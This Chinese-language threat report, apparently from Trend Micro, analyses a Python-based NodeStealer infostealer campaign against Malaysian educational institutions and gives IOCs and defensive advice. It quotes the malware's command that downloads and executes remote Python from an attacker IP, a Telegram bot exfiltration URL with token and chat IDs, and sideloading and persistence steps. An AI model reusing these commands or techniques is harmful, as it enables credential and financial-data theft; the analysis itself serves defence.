Python版NodeStealer变种瞄准Facebook广告管理器

NodeStealer恶意软件已从基于JavaScript的威胁演变为基于Python的威胁，使其能够窃取更广泛的敏感数据。

趋势科技的MXDR团队在针对马来西亚教育机构的恶意软件活动中识别出这一更新的NodeStealer变种，与越南威胁组织有关联。

此最新版本的NodeStealer不仅能够收集信用卡详细信息和浏览器存储数据，还针对Facebook广告管理器账户，窃取关键的财务和业务信息。

感染链始于带有恶意嵌入链接的鱼叉式网络钓鱼电子邮件，点击后，会下载并安装恶意软件，伪装成合法应用程序。

恶意软件使用复杂技术，如DLL侧加载和编码的PowerShell命令，绕过安全防御并执行最终有效负载，通过Telegram外泄数据。

技术细节

感染始于从可疑Gmail地址发送的鱼叉式网络钓鱼电子邮件，针对组织内的多个用户（图1）。电子邮件包含一个嵌入链接，诱使收件人相信它是指向PDF文件的链接。一旦点击，它会下载恶意文件：一个看似无害的PDF，旨在利用用户设备中的漏洞，允许攻击者安装恶意软件并窃取敏感信息。

图1. 感染链

攻击者通过发送虚假的版权侵权通知来欺骗用户（图2）。这种策略迫使收件人立即采取行动，而不仔细考虑消息内容，通常导致他们点击恶意链接或下载有害文件。欺诈性通知被制作成看起来像是来自合法机构。

图2. 带有恶意嵌入链接的电子邮件样本（翻译：“知识产权侵权通知”）

一旦用户点击电子邮件中的恶意嵌入链接，它会触发名为Nombor Rekod 052881.zip的可疑文件下载。提取zip文件内容后，用户无意中将几个可疑文件释放到系统上。这些丢弃的文件如下：

D:<USER>\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\GHelper.dll
D:<USER>\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\Nombor Rekod 052881.exe
D:<USER>\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\hpreaderfprefs.dat
D:<USER>\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\oledlg.dll
D:<USER>\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\images\active-license.bat
D:<USER>\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\images\license-key.exe
D:<USER>\Downloads\Nombor Rekod 052881\Nombor Rekod 052881\images\license.rar

可执行文件Nombor Rekod 052881.exe，看起来像PDF阅读器——通常被认为是受信任的应用程序——被观察到用于侧加载恶意DLL文件oledlg.dll（图3）。因此，恶意软件能够在合法程序的幌子下执行其恶意操作，使其能够绕过安全防御并无察觉地进行攻击。

图3. 遥测数据中的DLL侧加载证据

如图4所示，侧加载的DLL然后使用命令提示符（cmd.exe）执行批处理文件images\active-license.bat。

1

C:\Windows\system32\cmd.exe /c start /min images\active-license.bat -> C:\Windows\system32\cmd.exe /K images\active-license.bat

图4. DLL侧加载的进程链

此批处理文件images\active-license.bat包含恶意编码命令，然后执行如图5所示的PowerShell：

图5. 恶意编码的PowerShell执行

PowerShell命令执行以下操作：

隐藏控制台窗口
强制创建文件夹%LocalAppData%\ChromeApplication
解压缩license.rar文件（使用license.exe）到%LocalAppData%\ChromeApplication

images\license-key.exe (SHA256: 0b1866b627d8078d296e7d39583c9f856117be79c1d226b8c9378fe075369118)
- 原始文件名：Rar.exe (WinRAR 7.1.0)
- 命令行RAR
- 用于解压缩license.rar
images\license.rar (SHA256: ed1c48542a3e58020bd624c592f6aa7f7868ee16fbb03308269d44c4108011b1)
- 存档受密码保护（密码：Kimsexy@hacking.vn）。
- 密码可以从去混淆的PowerShell命令中获得。
- 包含便携式Python 3.10解释器，将下载并执行最终有效负载。
- synaptics.exe - 原始文件名：pythonw.exe (python cli解释器)
- vcruntime140.dll
- python3.10.dll
- 其他文件夹
- C:\Users<USERNAME>\AppData\Local\ChromeApplication\DLLs**

下载并执行位于%User Profile%\document.pdf的诱饵PDF文件：

1

"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\%User Profile%\document.pdf"

通过启动文件夹确保持久性：

创建文件WindowsSecurity.lnk
将文件存储在%Application Data%\Microsoft\Windows\Start Menu\Programs\Startup\

通过命令下载（内存中）并执行最终有效负载：

1

cmd /C start "" "%LOCALAPPDATA%\ChromeApplication\synaptics.exe" -c "import requests;exec(requests.get('http[://]88.216.99.5:15707/entry.txt'), verify=False).text)

恶意软件尝试连接到URL http[://]88.216.99.5:15707/entry.txt以下载并执行（内存中）其最终有效负载。

文件entry.txt包含一个混淆的Python脚本，如图6所示。脚本使用原生Python命令exec()和marshal.loads()的组合直接执行Python字节码。

图6. 直接执行Python字节码的Python脚本

如图7所示，字节码的反汇编用于使用函数hybrid_decrypt解密另一个二进制字符串。该函数的输出存储在变量code中。然后变量传递给函数runner以执行解密的字节码。

图7. 反汇编的Python字节码

从变量code反汇编字节码显示，预期的最终有效负载是一个信息窃取器，旨在收集信用卡数据和存储在Web浏览器中的敏感信息（图8）。

图8. 最终有效负载为信息窃取器

除了收集数据外，此新活动还针对Facebook广告管理器账户，提取财务和业务相关信息以驱动恶意广告活动（图9）。

图9. 针对Facebook广告管理器账户

观察到数据外泄是通过Telegram进行的，被盗的敏感信息首先被编译成zip存档。然后，此存档数据发送到特定的Telegram链接。使用Telegram作为传输被盗数据的媒介，确保网络犯罪分子外泄敏感信息的隐蔽和高效方法。

1

https[://]api[.]telegram[.]org/bot7688244721:AAEuVdGvEt2uIYmzQjJmSJX1JKFud9pr1XI/sendDocument

使用的聊天ID参数可以是‘-1002426006531’或‘-1002489276039’。

结论和建议

最新的NodeStealer变种展示了更复杂的数据窃取方法：它专门针对Facebook广告管理器账户、信用卡信息和存储在Web浏览器中的机密数据，使用日益复杂的方法来绕过检测。此更新版本强调需要提高意识并采取强大的网络安全措施来防御像NodeStealer这样的威胁。

为防范此类威胁，强烈建议采取以下步骤：

对可疑电子邮件保持谨慎。始终对来自未知或不受信任来源的电子邮件持怀疑态度。特别警惕包含嵌入链接的电子邮件，因为这些可能导致网络钓鱼站点，旨在窃取个人信息或提示自动下载恶意软件，包括像NodeStealer这样的信息窃取器。用户不应点击来自不熟悉发件人的链接或下载附件。
教育用户识别威胁。任何强大网络安全防御的关键组成部分是培训。必须教育用户如何识别网络钓鱼攻击、可疑电子邮件和潜在有害链接的迹象。了解常见的社会工程策略，如欺诈性电子邮件请求或欺骗性网站URL，可以帮助用户做出明智决策并避免成为网络威胁的受害者。
定期扫描恶意软件并保持防病毒软件更新。定期扫描系统以查找恶意软件，并确保防病毒软件使用最新的病毒定义更新，对于防御像NodeStealer这样的威胁至关重要。网络犯罪分子不断演变其策略，因此安全工具必须始终配备以识别和阻止最新威胁。确保系统定期检查感染，并且防病毒软件自动安装更新以跟上新的恶意软件变种。

通过采用这些实践，个人和组织可以显著加强对其防御，抵御像NodeStealer这样的复杂恶意软件。主动步骤——如谨慎的电子邮件习惯、用户教育和定期系统维护——对于构建全面的网络安全策略至关重要，有助于减轻数据泄露和其他恶意活动的风险。

趋势科技Vision One威胁情报

为保持领先于不断演变的威胁，趋势科技客户可以在趋势科技Vision One中访问一系列情报报告和威胁洞察。威胁洞察帮助客户在网络威胁发生之前保持领先，并更好地为新兴威胁做好准备。它提供关于威胁行为者、其恶意活动及其使用技术的全面信息。通过利用此情报，客户可以采取主动步骤保护其环境、减轻风险并有效响应威胁。

趋势科技Vision One情报报告应用[IOC扫描]

NodeStealer 2.0 – Python版本：窃取Facebook业务账户
Python版NodeStealer变种瞄准Facebook广告管理器

趋势科技Vision One威胁洞察应用

新兴威胁：Python版NodeStealer变种瞄准Facebook广告管理器

狩猎查询

趋势科技Vision One搜索应用趋势科技Vision One客户可以使用搜索应用匹配或狩猎此博客文章中提到的恶意指标与其环境中的数据。

攻击的恶意软件组件检测

1

malName:(*RASPBERRYROBIN* OR *NODESTEALER*) AND eventName:MALWARE_DETECTION

更多狩猎查询可供具有威胁洞察权限的Vision One客户使用。

妥协指标（IOCs）

指标	SHA256	描述	检测
oledlg.dll	f813da93eed9c536154a6da5f38462bfb4ed80c85dd117c3fd681cf4790fbf71	侧加载DLL	Trojan.Win32.RASPBERRYROBIN.HA
active-license.bat	1c9c7bb07acb9d612af2007cb633a6b1f569b197b1f93abc9bd3af8593e1ec66	执行PowerShell命令	HackTool.BAT.HideConsole.A
WindowsSecurity.lnk	786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458	创建持久性	Trojan.LNK.DOWNLOADER.D
hxxps://t[.]ly/MRAbJ		恶意下载链接	Dangerous – Disease Vector
hxxp://88[.]216[.]99[.]5:15707/entry[.]txt			Dangerous – Malware Accomplice